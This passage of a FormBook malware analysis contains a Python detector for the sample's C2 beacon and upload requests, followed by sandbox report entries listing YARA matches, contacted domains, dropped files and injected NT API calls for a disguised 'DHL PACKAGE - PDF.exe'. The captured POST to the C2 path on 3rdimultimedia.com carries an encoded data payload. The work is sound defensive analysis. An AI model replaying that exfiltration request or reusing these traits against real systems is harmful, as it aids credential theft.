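    b"Host: www.shopendora.com\r\n"
    b"Connection: close\r\n\r\n"
)

POST_BODY = (
    b"SX=mP7tuIIAGekpHRt197OgmjLZkT3kcJNh6929zE6CUAoT7CLBFsIq(P6_S1k-p12PL02Pv5ZaZ70oCNSWEgMLiSMe1b"
    b"JHHSlFwWz8XmTYIv5rcqb5Nfz3xtUVqdh-gN8uI8n6rSMu30kL8i4C6PZZCUWseoI-tZJIdknzAuYlOz6NBoFr~_4_Jl"
    b"kgg8ARgmg1DcPTz0ufO9CiYpwR~kh3(OvNYH5OEmRUJwJHrsY9MpxdOk(kY7lv2HWlW_7STKMXG9rycKoBCeMN6uldkS"
    b"(BhJYEKj9Vn_bSzSgf3iMwF70J5WXS1bFWTw9EcuxfpvGnHdIYssj1(5NtBM~s3sZQJ1nKnuUS9KRfJIUWsJVcG0ckjE2"
    b"EnXq0ZwnkYrOQduaA(BzgrghokxdDAdsSyw)."
)
POST_SAMPLE = (
    b"POST /c232/ HTTP/1.1\r\n"
    b"Host: www.3rdimultimedia.com\r\n"
    b"Connection: close\r\n"
    b"Content-Length: " + str(len(POST_BODY)).encode() + b"\r\n"
    b"Cache-Control: no-cache\r\n"
    b"Origin: http://www.3rdimultimedia.com\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Accept: */*\r\n"
    b"Referer: http://www.3rdimultimedia.com/c232/\r\n"
    b"Accept-Language: en-US\r\n"
    b"Accept-Encoding: gzip, deflate\r\n\r\n" + POST_BODY
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, query, headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {"method": method, "path": parts.path, "query": parts.query,
            "headers": headers, "body": body.decode("latin-1")}


def split_params(qs):
    """k=v&k=v split without percent or plus decoding: the values are opaque."""
    return [tuple(kv.partition("=")[::2]) for kv in qs.split("&") if kv]


def flag_request(req):
    """Indicators for this sample's beacon (GET) and upload (POST) requests."""
    h = req["headers"]
    flags = []
    if "user-agent" not in h:
        flags.append("no_user_agent")          # the GET beacons
    elif "Trident/7.0" in h["user-agent"]:
        flags.append("ie11_trident_ua")        # fixed IE11 string on the POSTs
    if C2_PATH.match(req["path"]):
        flags.append("short_dir_path")
    origin, referer = h.get("origin"), h.get("referer")
    if origin and referer and referer == origin + req["path"]:
        flags.append("referer_is_origin_plus_path")
    payload = req["query"] if req["method"] == "GET" else req["body"]
    params = split_params(payload)
    if params and all(OPAQUE.match(v) for _, v in params) \
            and max(len(v) for _, v in params) >= 40:
        flags.append("opaque_payload")
    return flags


if __name__ == "__main__":
    for raw in (GET_SAMPLE, POST_SAMPLE):
        req = parse_request(raw)
        print(req["method"], req["headers"]["host"], req["path"], flag_request(req))
```

None of the flags is decisive alone (a missing User-Agent or a short path occurs in benign traffic), which is why the function returns the whole list: the combination of no_user_agent with an opaque query on the GET, and of the IE11 string, form upload and self-referential Referer on the POST, is what separates these two requests from ordinary browsing.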
Source: unknown; DNS traffic detected: queries for: www.shopendora.com
Source: unknown; HTTP traffic detected: POST /c232/ HTTP/1.1; Host: www.3rdimultimedia.com; Connection: close; Content-Length: 408 (same headers, Data Raw and SX= payload as the 408-byte global traffic POST above)
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: r2400.xml.0.dr; String found in binary or memory: http://gimp-print.sourceforge.net/xsd/gp.xsd-1.0
Source: reportobjectbar.xml.0.dr; String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: DHL PACKAGE - PDF.exe; String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: DHL PACKAGE - PDF.exe; String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: nsxD96C.tmp.0.dr; String found in binary or memory: http://openoffice.org/2001/menu
Source: reportobjectbar.xml.0.dr; String found in binary or memory: http://openoffice.org/2001/toolbar
Source: NETSTAT.EXE, 00000014.00000002.510534189.0000000003E49000.00000004.00000001.sdmp; String found in binary or memory: http://www.3rdimultimedia.com
Source: NETSTAT.EXE, 00000014.00000002.510534189.0000000003E49000.00000004.00000001.sdmp; String found in binary or memory: http://www.3rdimultimedia.com/c232/
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp, reportobjectbar.xml.0.dr; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: nsxD96C.tmp.0.dr; String found in binary or memory: http://www.freedesktop.org/standards/shared-mime-info
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: nsxD96C.tmp.0.dr; String found in binary or memory: http://www.oasis-open.org/docbook/xml/4.3/docbookx.dtd
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000009.00000000.306084475.000000000B156000.00000002.00000001.sdmp; String found in binary or memory: http://www.zhongyicts.com.cn
Source: NETSTAT.EXE, 00000014.00000002.504997382.000000000355C000.00000004.00000001.sdmp; String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: NETSTAT.EXE, 00000014.00000002.504997382.000000000355C000.00000004.00000001.sdmp; String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: NETSTAT.EXE, 00000014.00000002.504997382.000000000355C000.00000004.00000001.sdmp; String found in binary or memory: https://login.live.com/oauth20_desktop.srf
Source: NETSTAT.EXE, 00000014.00000002.501270285.0000000000D98000.00000004.00000001.sdmp; String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2Gw
Source: NETSTAT.EXE, 00000014.00000002.504997382.000000000355C000.00000004.00000001.sdmp; String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: NETSTAT.EXE, 00000014.00000002.504997382.000000000355C000.00000004.00000001.sdmp; String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033f
Source: NETSTAT.EXE, 00000014.00000002.504997382.000000000355C000.00000004.00000001.sdmp; String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe; Code function: 0_2_004053CB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004053CB

E-Banking Fraud:

Yara detected FormBook
Source: Yara match; File source: 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.344815518.0000000001260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.344851460.0000000001290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.501966383.0000000001220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.501326161.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 4.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Dropped file: C:\Users\user\AppData\Roaming\597OP970\597logri.ini
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Dropped file: C:\Users\user\AppData\Roaming\597OP970\597logrv.ini
Malicious sample detected (through community Yara rule)
Source: 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.344815518.0000000001260000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.344815518.0000000001260000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.344851460.0000000001290000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.344851460.0000000001290000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.501966383.0000000001220000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.501966383.0000000001220000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.501326161.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.501326161.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 4.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 4.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00419C90 NtCreateFile,4_2_00419C90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00419D40 NtReadFile,4_2_00419D40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00419DC0 NtClose,4_2_00419DC0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00419CE3 NtCreateFile,4_2_00419CE3
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00419C8B NtCreateFile,4_2_00419C8B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00419DBA NtClose,4_2_00419DBA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059540 NtReadFile,LdrInitializeThunk,4_2_05059540
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_050595D0 NtClose,LdrInitializeThunk,4_2_050595D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059710 NtQueryInformationToken,LdrInitializeThunk,4_2_05059710
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059780 NtMapViewOfSection,LdrInitializeThunk,4_2_05059780
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_050597A0 NtUnmapViewOfSection,LdrInitializeThunk,4_2_050597A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_050596E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_050596E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_05059910
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_050599A0 NtCreateSection,LdrInitializeThunk,4_2_050599A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059840 NtDelayExecution,LdrInitializeThunk,4_2_05059840
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059860 NtQuerySystemInformation,LdrInitializeThunk,4_2_05059860
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059A20 NtResumeThread,LdrInitializeThunk,4_2_05059A20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059A50 NtCreateFile,LdrInitializeThunk,4_2_05059A50
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059520 NtWaitForSingleObject,4_2_05059520
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0505AD30 NtSetContextThread,4_2_0505AD30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059560 NtWriteFile,4_2_05059560
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_050595F0 NtQueryInformationFile,4_2_050595F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0505A710 NtOpenProcessToken,4_2_0505A710
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059730 NtQueryVirtualMemory,4_2_05059730
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059760 NtOpenProcess,4_2_05059760
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059770 NtSetInformationFile,4_2_05059770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0505A770 NtOpenThread,4_2_0505A770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059FE0 NtCreateMutant,4_2_05059FE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059610 NtEnumerateValueKey,4_2_05059610
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059650 NtQueryValueKey,4_2_05059650
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059660 NtAllocateVirtualMemory,4_2_05059660
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059670 NtQueryInformationProcess,4_2_05059670
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_050596D0 NtCreateKey,4_2_050596D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059950 NtQueueApcThread,4_2_05059950
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_050599D0 NtCreateProcessEx,4_2_050599D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059820 NtEnumerateKey,4_2_05059820
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0505B040 NtSuspendThread,4_2_0505B040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_050598A0 NtWriteVirtualMemory,4_2_050598A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_050598F0 NtReadVirtualMemory,4_2_050598F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059B00 NtSetValueKey,4_2_05059B00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0505A3B0 NtGetContextThread,4_2_0505A3B0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059A00 NtProtectVirtualMemory,4_2_05059A00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059A10 NtQuerySection,4_2_05059A10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_05059A80 NtOpenDirectoryObject,4_2_05059A80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00D754E0 NtDelayExecution,4_2_00D754E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00D7318C NtWriteVirtualMemory,4_2_00D7318C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809B00 NtSetValueKey,LdrInitializeThunk,20_2_03809B00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809A50 NtCreateFile,LdrInitializeThunk,20_2_03809A50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_038099A0 NtCreateSection,LdrInitializeThunk,20_2_038099A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809910 NtAdjustPrivilegesToken,LdrInitializeThunk,20_2_03809910
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809840 NtDelayExecution,LdrInitializeThunk,20_2_03809840
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809860 NtQuerySystemInformation,LdrInitializeThunk,20_2_03809860
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809780 NtMapViewOfSection,LdrInitializeThunk,20_2_03809780
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809FE0 NtCreateMutant,LdrInitializeThunk,20_2_03809FE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809710 NtQueryInformationToken,LdrInitializeThunk,20_2_03809710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809770 NtSetInformationFile,LdrInitializeThunk,20_2_03809770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_038096D0 NtCreateKey,LdrInitializeThunk,20_2_038096D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_038096E0 NtFreeVirtualMemory,LdrInitializeThunk,20_2_038096E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809610 NtEnumerateValueKey,LdrInitializeThunk,20_2_03809610
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809650 NtQueryValueKey,LdrInitializeThunk,20_2_03809650
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809660 NtAllocateVirtualMemory,LdrInitializeThunk,20_2_03809660
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_038095D0 NtClose,LdrInitializeThunk,20_2_038095D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809540 NtReadFile,LdrInitializeThunk,20_2_03809540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809560 NtWriteFile,LdrInitializeThunk,20_2_03809560
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_0380A3B0 NtGetContextThread,20_2_0380A3B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809A80 NtOpenDirectoryObject,20_2_03809A80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809A00 NtProtectVirtualMemory,20_2_03809A00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809A10 NtQuerySection,20_2_03809A10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809A20 NtResumeThread,20_2_03809A20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_038099D0 NtCreateProcessEx,20_2_038099D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809950 NtQueueApcThread,20_2_03809950
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_038098A0 NtWriteVirtualMemory,20_2_038098A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_038098F0 NtReadVirtualMemory,20_2_038098F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809820 NtEnumerateKey,20_2_03809820
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_0380B040 NtSuspendThread,20_2_0380B040
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_038097A0 NtUnmapViewOfSection,20_2_038097A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_0380A710 NtOpenProcessToken,20_2_0380A710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809730 NtQueryVirtualMemory,20_2_03809730
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809760 NtOpenProcess,20_2_03809760
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_0380A770 NtOpenThread,20_2_0380A770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809670 NtQueryInformationProcess,20_2_03809670
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_038095F0 NtQueryInformationFile,20_2_038095F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_03809520 NtWaitForSingleObject,20_2_03809520
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_0380AD30 NtSetContextThread,20_2_0380AD30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DE9C90 NtCreateFile,20_2_00DE9C90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DE9DC0 NtClose,20_2_00DE9DC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DE9D40 NtReadFile,20_2_00DE9D40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DE9E70 NtAllocateVirtualMemory,20_2_00DE9E70
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DE9CE3 NtCreateFile,20_2_00DE9CE3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DE9C8B NtCreateFile,20_2_00DE9C8B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DE9DBA NtClose,20_2_00DE9DBA
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeCode function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033A9
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\SitulaCystocele.dll 18E86106E60613594527C85FE6C97287FC8C3715181A62CB2B4D2258C210B6C8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 037CB150 appears 35 times
          Source: DHL PACKAGE - PDF.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: DHL PACKAGE - PDF.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: sfc.dll
          Source: 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.344815518.0000000001260000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.344815518.0000000001260000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.344851460.0000000001290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.344851460.0000000001290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.501966383.0000000001220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
